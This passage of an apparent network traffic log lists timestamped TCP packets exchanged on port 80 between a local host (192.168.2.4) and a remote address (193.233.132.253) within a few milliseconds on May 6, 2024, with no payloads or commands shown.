May 6, 2024 07:53:14.411531925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411542892 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411556005 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411566019 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411570072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411582947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411593914 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411597013 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411614895 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411632061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411642075 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411645889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411664009 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411669970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411689043 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411705971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411783934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411797047 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411859989 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411871910 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411883116 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411895990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411907911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411920071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411952019 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411963940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411964893 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411994934 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412015915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412029028 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412049055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412200928 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412204027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412214041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412229061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412240982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412251949 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412261963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412265062 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412265062 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412276983 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412288904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412293911 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412302017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412313938 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412317991 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412327051 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412337065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412348986 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412352085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412364960 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412364960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412391901 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412398100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412406921 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412415981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412432909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412432909 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412447929 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412467957 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412504911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412517071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412527084 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412537098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412548065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412552118 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412559032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412571907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412580013 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412591934 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412595034 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412607908 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412612915 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412628889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412632942 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412652969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412667990 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412672997 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412684917 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412719965 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412803888 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412930012 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412942886 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412977934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.412987947 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.412996054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413019896 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413032055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413043022 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413043976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413058043 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413081884 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413095951 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413108110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413119078 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413130045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413141966 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413156986 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413188934 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413202047 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413203001 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413213968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413225889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413235903 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413238049 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413250923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413252115 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413264990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413269997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413276911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413285017 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413290977 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413304090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413309097 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413317919 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.413332939 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.413357019 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414019108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414031982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414057970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414088964 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414171934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414186954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414197922 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414210081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414222002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414225101 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414237022 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414247990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414248943 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414261103 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414272070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414274931 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414283037 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414283991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414295912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414309025 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414309025 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414334059 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414336920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414351940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414356947 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414376020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414391994 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414429903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414441109 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414452076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414463997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414467096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414484024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414490938 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414499998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414505005 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414514065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414522886 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414529085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414539099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414542913 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414556026 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414567947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414589882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414589882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414589882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414589882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414623976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414652109 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414666891 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414678097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414690018 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414700985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414712906 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414724112 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414735079 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414747000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414758921 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414771080 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414783001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414794922 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414805889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414817095 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414830923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414841890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414853096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414865017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414875031 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414876938 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414889097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414902925 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414911032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414937019 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.414967060 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414979935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.414993048 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415004969 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415014982 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415016890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415030003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415041924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415041924 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415050030 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415055037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415066004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415076971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415077925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415092945 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415102959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415105104 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415127039 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415136099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415200949 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415215015 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415225983 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415241957 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415252924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415266037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415277004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415285110 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415285110 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415285110 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415291071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415307045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415317059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415321112 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415328979 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415332079 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415344954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415350914 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415359020 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415364981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415371895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415383101 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415386915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415400028 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415400982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415416956 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415419102 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415430069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415431023 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415446043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415462971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415479898 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415483952 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415493011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415503979 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415515900 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415527105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415527105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415528059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415540934 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415541887 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415554047 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415555954 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415566921 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415576935 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415580034 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415592909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415597916 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415616035 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415627956 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415637016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415648937 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415661097 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415673018 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415679932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415689945 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415697098 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415703058 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415721893 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415730000 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415734053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415749073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415750980 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415762901 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415769100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415776014 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415787935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415798903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415802002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415812016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415826082 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415828943 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415842056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415843964 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415870905 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415894985 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415909052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415921926 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415935993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415947914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415949106 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415961027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415961981 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.415976048 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.415994883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416007042 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416038036 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416050911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416064978 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416074991 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416076899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416090012 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416093111 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416109085 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416110992 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416134119 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416136026 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416152954 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416160107 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416167021 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416168928 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416179895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416188955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416194916 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416201115 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416208029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416208982 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416222095 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416229963 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416234970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416251898 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416255951 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416265011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416276932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416277885 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416291952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416300058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416304111 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416316032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416316986 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416331053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416342020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416342974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416357040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416366100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416369915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416379929 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416404963 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416430950 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416444063 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416455030 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416465998 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416480064 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416491032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416502953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.416510105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416510105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416510105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.416516066 CEST	80	49743	193.233.132.253	192.168.2.4
